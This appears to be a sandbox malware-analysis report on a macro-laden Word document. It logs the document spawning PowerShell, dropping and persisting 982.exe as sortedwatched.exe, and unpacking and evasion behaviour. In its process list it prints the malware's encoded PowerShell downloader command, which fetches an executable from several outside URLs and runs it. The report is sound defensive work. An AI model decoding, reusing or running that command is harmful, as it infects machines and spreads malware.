Code function: 7_2_0040F7A0 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,

7_2_0040F7A0

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$ovo_documento_2019.09.20.doc

Jump to behavior

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user~1\AppData\Local\Temp\CVR81DD.tmp

Jump to behavior

Document contains an OLE Word Document stream indicating a Microsoft Word file

Show sources

Source: Nuovo_documento_2019.09.20.doc

OLE indicator, Word Document stream: true

Document contains summary information with irregular field values

Show sources

Source: Nuovo_documento_2019.09.20.doc	OLE document summary: title field not present or empty
Source: Nuovo_documento_2019.09.20.doc	OLE document summary: edited time not present or 0

Found command line output

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........3!j.............3!j....L.,.L\| jD......n$(&j...n....L\| j.............7!j0..... jL.,.0j%.............$(&j.. j....	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........,...........0j%.....A.{u,...............a.{u..0.....X...h.......Ul....................................zu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........,...................A.{u,...............a.{u..0.....X...h...$...bl....................................zu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........,...........0j%.....A.{u,...............a.{u..0.....X...h...$....l....................................zu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........,...................A.{u,...............a.{u..0.....X...h........l....................................zu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................#...0j%.0...A.{u................a.{u..0.....X...h...d....l..................#.................zu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................#.......0...A.{u................a.{u..0.....X...h...d....l..................#.......l.........zu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........L.......'...........A.{uL...............a.{u..0.....X...h...d....l..................'.......,.........zu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........L.......+...........A.{uL...............a.{u..0.....X...h...d....m..................+.......,.........zu........	Jump to behavior

Might use command line arguments

Show sources

Source: C:\Users\user\982.exe

Command line argument: PB

4_2_0042E6A0

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Queries process information (via WMI, Win32_Process)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Sample is known by Antivirus

Show sources

Source: Nuovo_documento_2019.09.20.doc

Virustotal: Detection: 22%

Sample requires command line parameters (based on API chain)

Show sources

Source: C:\Users\user\982.exe

Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess

graph_5-2847

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -encod JABtAEgASwB3AFIARgA9ACcASgBJAGIAbgB2AGYAbwBMACcAOwAkAGIAMwBhAFMAaQBtADQAXwAgAD0AIAAnADkAOAAyACcAOwAkAEcAdgBIAEsAMgBNAD0AJwBuAF8AdgBQAGoAcgBwACcAOwAkAFEAegBpAEEAQgBCADYATAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgAzAGEAUwBpAG0ANABfACsAJwAuAGUAeABlACcAOwAkAGoAdwB0ADcAXwBOAD0AJwBaADYARwA2AG8AVABvAFMAJwA7ACQAegBfAG4AZgAwADkAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEUASQBwAFMARwB3AHUAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAGEAYgBpAG8AcwBkAGUAbABhAG0AbwByAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAdAB5AEUAcQBvAEUAbABvAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBlAHUAcgBvAGEAdQBzAGkAbABpAC4AaQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGkASQBGAFMAWABUAFcAbQBOAC8AQABoAHQAdABwAHMAOgAvAC8AbwBwAGUAbAAuAGsAbQAuAHUAYQAvAGIAbABvAGcAcwAvADMAdQBqAHUAXwB0AGkAbwB3AGYAOQBpAC0AMQA0ADkALwBAAGgAdAB0AHAAcwA6AC8ALwBoAGEAYgBsAGEAYgBlAHMAdABvAHAALgBsAGkAdgBlAC8AcgBxAGIAZQA5AHAALwBwAEsAawBMAGkAdQBxAEcAagAvA
Source: unknown	Process created: C:\Users\user\982.exe 'C:\Users\user\982.exe'
Source: unknown	Process created: C:\Users\user\982.exe 'C:\Users\user\982.exe'
Source: unknown	Process created: C:\Users\user\982.exe --4e722ada
Source: unknown	Process created: C:\Users\user\982.exe --4e722ada
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Source: unknown	Process created: C:\Windows\System32\sortedwatched.exe C:\Windows\system32\sortedwatched.exe
Source: unknown	Process created: C:\Windows\System32\sortedwatched.exe C:\Windows\system32\sortedwatched.exe
Source: unknown	Process created: C:\Windows\System32\sortedwatched.exe --2a75e385
Source: unknown	Process created: C:\Windows\System32\sortedwatched.exe --2a75e385
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\982.exe 'C:\Users\user\982.exe'	Jump to behavior
Source: C:\Users\user\982.exe	Process created: C:\Users\user\982.exe 'C:\Users\user\982.exe'	Jump to behavior
Source: C:\Users\user\982.exe	Process created: C:\Users\user\982.exe --4e722ada	Jump to behavior
Source: C:\Users\user\982.exe	Process created: C:\Users\user\982.exe --4e722ada	Jump to behavior
Source: C:\Windows\System32\sortedwatched.exe	Process created: C:\Windows\System32\sortedwatched.exe C:\Windows\system32\sortedwatched.exe	Jump to behavior
Source: C:\Windows\System32\sortedwatched.exe	Process created: C:\Windows\System32\sortedwatched.exe --2a75e385	Jump to behavior
Source: C:\Windows\System32\sortedwatched.exe	Process created: C:\Windows\System32\sortedwatched.exe --2a75e385	Jump to behavior

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Users\user\982.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: ntdll.pdb source: 982.exe, 00000004.00000003.293286536.01BC0000.00000004.00000001.sdmp, 982.exe, 00000006.00000003.297891020.01B50000.00000004.00000001.sdmp, sortedwatched.exe, 00000009.00000003.318288495.00CE0000.00000004.00000001.sdmp, sortedwatched.exe, 0000000B.00000003.322801776.00EB0000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb3 source: 982.exe, 00000004.00000003.293286536.01BC0000.00000004.00000001.sdmp, 982.exe, 00000006.00000003.297891020.01B50000.00000004.00000001.sdmp, sortedwatched.exe, 00000009.00000003.318288495.00CE0000.00000004.00000001.sdmp, sortedwatched.exe, 0000000B.00000003.322801776.00EB0000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\982.exe	Unpacked PE file: 5.2.982.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Users\user\982.exe	Unpacked PE file: 7.2.982.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Windows\System32\sortedwatched.exe	Unpacked PE file: 10.2.sortedwatched.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Windows\System32\sortedwatched.exe	Unpacked PE file: 12.2.sortedwatched.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\982.exe	Unpacked PE file: 5.2.982.exe.400000.0.unpack
Source: C:\Users\user\982.exe	Unpacked PE file: 7.2.982.exe.400000.0.unpack
Source: C:\Windows\System32\sortedwatched.exe	Unpacked PE file: 10.2.sortedwatched.exe.400000.0.unpack
Source: C:\Windows\System32\sortedwatched.exe	Unpacked PE file: 12.2.sortedwatched.exe.400000.0.unpack

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\982.exe

Code function: 4_2_00432522 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

4_2_00432522

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Users\user\982.exe	Code function: 4_2_0042937D push ecx; ret	4_2_00429390
Source: C:\Users\user\982.exe	Code function: 4_2_00429303 push ecx; ret	4_2_00429316
Source: C:\Users\user\982.exe	Code function: 4_2_002D2B12 push eax; ret	4_2_002D2B1C
Source: C:\Users\user\982.exe	Code function: 4_2_002D2CD3 push eax; ret	4_2_002D2CD4
Source: C:\Users\user\982.exe	Code function: 5_2_004123D3 push eax; ret	5_2_004123DD
Source: C:\Users\user\982.exe	Code function: 5_2_00412594 push eax; ret	5_2_00412595
Source: C:\Users\user\982.exe	Code function: 6_2_003F2CD3 push eax; ret	6_2_003F2CD4
Source: C:\Users\user\982.exe	Code function: 6_2_003F2B12 push eax; ret	6_2_003F2B1C
Source: C:\Users\user\982.exe	Code function: 7_2_004123D3 push eax; ret	7_2_004123DD
Source: C:\Users\user\982.exe	Code function: 7_2_00412594 push eax; ret	7_2_00412595
Source: C:\Users\user\982.exe	Code function: 7_1_004123D3 push eax; ret	7_1_004123DD
Source: C:\Users\user\982.exe	Code function: 7_1_00412594 push eax; ret	7_1_00412595
Source: C:\Windows\System32\sortedwatched.exe	Code function: 9_2_003F2CD3 push eax; ret	9_2_003F2CD4
Source: C:\Windows\System32\sortedwatched.exe	Code function: 9_2_003F2B12 push eax; ret	9_2_003F2B1C
Source: C:\Windows\System32\sortedwatched.exe	Code function: 11_2_00502CD3 push eax; ret	11_2_00502CD4
Source: C:\Windows\System32\sortedwatched.exe	Code function: 11_2_00502B12 push eax; ret	11_2_00502B1C
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_2_004123D3 push eax; ret	12_2_004123DD
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_2_00412594 push eax; ret	12_2_00412595
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_1_004123D3 push eax; ret	12_1_004123DD
Source: C:\Windows\System32\sortedwatched.exe	Code function: 12_1_00412594 push eax; ret	12_1_00412595

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\System32\sortedwatched.exe

Executable created and started: C:\Windows\System32\sortedwatched.exe

Jump to behavior

Drops PE files

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\982.exe

Jump to dropped file

Drops PE files to the user directory

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\982.exe

Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Show sources

Source: C:\Users\user\982.exe

PE file moved: C:\Windows\System32\sortedwatched.exe

Jump to behavior

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\982.exe

Jump to dropped file

Contains functionality to start windows services

Show sources

Source: C:\Users\user\982.exe

Code function: 7_2_0040F7A0 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,

7_2_0040F7A0

Hooking and other Techniques for Hiding and Protection:

Document contains an embedded VBA macro which may check the recent opened files (possible anti-VM)

Show sources

Source: Nuovo_documento_2019.09.20.doc

OLE, VBA macro line: If RecentFiles.Count > 3 Then

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\982.exe

File opened: C:\Windows\system32\sortedwatched.exe:Zone.Identifier read attributes | delete

Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Show sources

Source: C:\Users\user\982.exe	Code function: 4_2_00417380 IsWindowVisible,IsIconic,		4_2_00417380
Source: C:\Users\user\982.exe	Code function: 4_2_0040B948 IsIconic,GetWindowPlacement,GetWindowRect,		4_2_0040B948

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
